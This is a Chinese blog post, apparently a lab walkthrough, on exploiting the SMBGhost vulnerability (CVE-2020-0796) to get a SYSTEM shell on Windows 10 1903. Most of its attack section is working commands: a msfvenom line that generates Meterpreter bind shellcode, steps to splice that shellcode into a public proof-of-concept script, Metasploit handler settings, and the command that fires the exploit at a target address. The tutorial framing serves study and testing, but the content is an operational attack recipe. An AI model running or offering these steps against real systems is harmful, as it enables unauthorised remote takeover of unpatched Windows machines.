CVE-2020-0796(永恒之黑)漏洞复现利用GetShell

q##描述
北京时间2020年3月12日晚上,微软发布了一个最新到SMB远程代码执行漏洞。
SMB(Server Message Block)协议作为一种局域网文件共享传输协议,常被用来作为共享文件安全传输研究的平台。由于SMB 3.1.1协议中处理压缩消息时,对其中数据没有经过安全检查,直接使用会引发内存破坏漏洞,可能被攻击者利用远程执行任意代码,受黑客攻击的目标系统只要开机在线即可能被入侵。据了解,凡政府机构、企事业单位网络中采用Windows 10 1903之后的所有终端节点,如Windows家用版、专业版、企业版、教育版,Windows 10 1903 (19H1)、Windows 10 1909、 Windows Server 19H1均为潜在攻击目标,Windows 7不受影响。
被安全厂商命名为SMBGhost、EternalDarkness(“永恒之黑”)——我更喜欢ED这个称呼

影响范围

Windows 10 Version 1903 for 32-bit Systems
Windows 10 Version 1903 for x64-based Systems
Windows 10 Version 1903 for ARM64-based Systems
Windows Server, Version 1903 (Server Core installation)
Windows 10 Version 1909 for 32-bit Systems
Windows 10 Version 1909 for x64-based Systems
Windows 10 Version 1909 for ARM64-based Systems
Windows Server, Version 1909 (Server Core installation)

环境

靶机:windows10 1903 x64  
ip:172.16.127.134(关闭防火墙)
攻击机:MacOS ip:10.96.0.53

靶机地址:迅雷口令#X9861b84e#

漏洞检测工具:http://dl.qianxin.com/skylar6/CVE-2020-0796-Scanner.zip

POC:https://github.com/chompie1337/SMBGhost_RCE_PoC

利用

生成木马

msfvenom -p windows/x64/meterpreter/bind_tcp LPORT=8888 -b '\x00' -i 1 -f python


#-p windows/x64/meterpreter/bind_tcp 设置payload为windows64位meterpreter控制台下的正向连接




#LPORT=8888 设置开发端口为6666
#-b '\x00' 设置在生成的程序中避免出现'\x00'
#-i 1 设置编码次数为一次
#-f python 设置生成python格式文件

生成shellcode

1、将生成的shellcode全部复制

2、打开POC文件夹的exploit.py(原文件)

然后替换字符

3、打开MSF监听

msfconsole
use exploit/multi/handler
set payload windows/x64/meterpreter/bind_tcp
set lport 8888
set rhost 172.16.127.134
run

4、运行exploit.py脚本

python3 exploit.py -ip 172.16.127.134

若MSF控制台暂时无反应,则control+c终端,重新输入run

参考文章:https://www.cnblogs.com/Iamyoyodan/p/13081273.html

注意

只要成功即是system,但是shellcode极度不稳定,很容易卡死,靶机蓝屏,尤其注意只能以python3去执行脚本,其他版本我尝试后直接蓝屏。
建议靶机关闭防火墙,设置NAT模式,保证两台主机在同一网段内!

Typecho赞赏功能

「一键投喂 软糖/蛋糕/布丁/牛奶/冰阔乐!」

冷夜清风

(๑>ڡ<)☆谢谢老板们的投食~

使用微信扫描二维码完成支付


添加新评论

选择表情

  TimeLine

恢复正常更新,看心情吧。
--- updated on 2020-10-07 18:52:12 星期三

  About Me

我就是随便写写,您随便看看。
有事说事,没事烧纸,闲人勿扰,谢谢。
侧重方向:渗透测试,IT运维。

  Recent Comments

  •  小白: 无法解压怎么办?
  •  Liu先生的故事小屋: 网站改名字了原站点名字 小酱博客,现站点名字:Liu先生的故事小屋
  •  1231231: 测试
  •  122: 感谢
  •  御宅男: 码农路过,留下一个爪印!!!
  •  xue: 请问怎末给权限
  •  xue: 点了 run 一直闪退啥情况
  •  xue: 怎末解决的大佬
  •  小白兔: 感谢大佬,作为初学者能碰到这样的大佬是真的幸运
  •  wxyccc: 大佬真的太感谢你了 今天在网上找了无数资料都没能装好,出了太多问题, 有幸能看到你的文章 真的...

成功源于不懈的努力。

暗自伤心,不如立即行动。

再多一点努力,就多一点成功。

得意淡然,失意坦然;喜而不狂,忧而不伤。

海纳百川,有容乃大;壁立千仞,无欲则刚。